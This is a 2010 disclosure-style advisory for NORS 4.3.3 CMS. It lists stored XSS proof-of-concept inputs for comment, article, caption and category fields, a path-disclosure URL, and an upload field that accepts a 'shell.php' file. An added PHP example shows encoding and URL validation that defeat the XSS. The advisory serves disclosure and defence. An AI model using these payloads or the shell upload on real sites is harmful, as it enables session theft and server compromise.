CMS: NORS 4.3.3
Bug: Multiple Vulnerabilities
Version: public
URL: http://norsphp.com/get/4.3.3/zip/ [2]
Author: RubberDuck
Found Date: 03-02-10
Publication Date: 06-02-10
Permanent XSS PoC - Přidat komentář (Add comment)
Uživatelské jméno (Username) - SecIT
www - www.security-portal.cz">eSPecko</a><br><script>alert(/RubberDuck/)</script><a href="http://www.secit.sk
Permanent XSS PoC - Přidat článek (Add article)
http://localhost/nors_v4.3.3/administration/content/?event=post&command=add [4]
Název (Title) - <script>alert(/RubberDuck/)</script>
This also affects other sections:
http://localhost/nors_v4.3.3/administration/content/?event=comment&comma... [5]
Text - <script>alert(/RubberDuck/)</script>
Popisek (Caption) - xxx"></a><a href="http://www.security-portal.cz">Security-Portal</a><script>alert(/RubberDuck/)</script><a href="http://www.security-portal.cz
Persistent XSS - Rubriky (Categories)
http://localhost/nors_v4.3.3/administration/content/?event=category&comm... [7]
Název (Title) - <script>alert(/RubberDuck/)</script>
This also affects other sections that work with categories:
http://localhost/nors_v4.3.3/administration/content/?event=category&comm... [7]
http://localhost/nors_v4.3.3/administration/content/?event=category&comm... [8]
http://localhost/nors_v4.3.3/administration/content/?event=post&command=add [4]
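
One way to neutralise the stored XSS values listed above when they are written back into a page, as an added example in PHP (not NORS code and not part of the original advisory). The function names e, safe_www and render_author are hypothetical; the inputs are the values from the PoC above.

```php
<?php
// Added example; function names are hypothetical, not taken from NORS.

// Encode a value for HTML text or for a quoted attribute.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Accept only http(s) URLs for the commenter's "www" field.
// A bare host such as "www.example.org" gets "http://" prepended first.
function safe_www(string $raw): ?string
{
    $url = trim($raw);
    if (!preg_match('#^[a-z][a-z0-9+.-]*://#i', $url)) {
        $url = 'http://' . $url;
    }
    // Quotes, angle brackets and whitespace signal markup, not a URL.
    if (preg_match('/[\s"\'<>]/', $url)) {
        return null;
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    return $url;
}

// Render the comment author: name as text, www as an optional link.
function render_author(string $name, string $www): string
{
    $url = safe_www($www);
    if ($url === null) {
        return e($name);              // drop the link, keep the name
    }
    return '<a href="' . e($url) . '" rel="nofollow">' . e($name) . '</a>';
}

// Values from the comment PoC: the www value closes the href attribute.
$www = 'www.security-portal.cz">eSPecko</a><br><script>alert(/RubberDuck/)</script><a href="http://www.secit.sk';
echo render_author('SecIT', $www), "\n";                      // link rejected
echo render_author('SecIT', 'www.security-portal.cz'), "\n";  // link kept
// Title / text / caption fields: encode on output so markup stays inert.
echo e('<script>alert(/RubberDuck/)</script>'), "\n";
```
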
Full Path Disclosure - administration
http://localhost/nors_v4.3.3/administration/content/?event=post'&command=add
Insecure Image Upload - Přidat článek (Add article)
http://localhost/nors_v4.3.3/administration/content/?event=post&command=add [4]
Obrázek (Image) - shell.php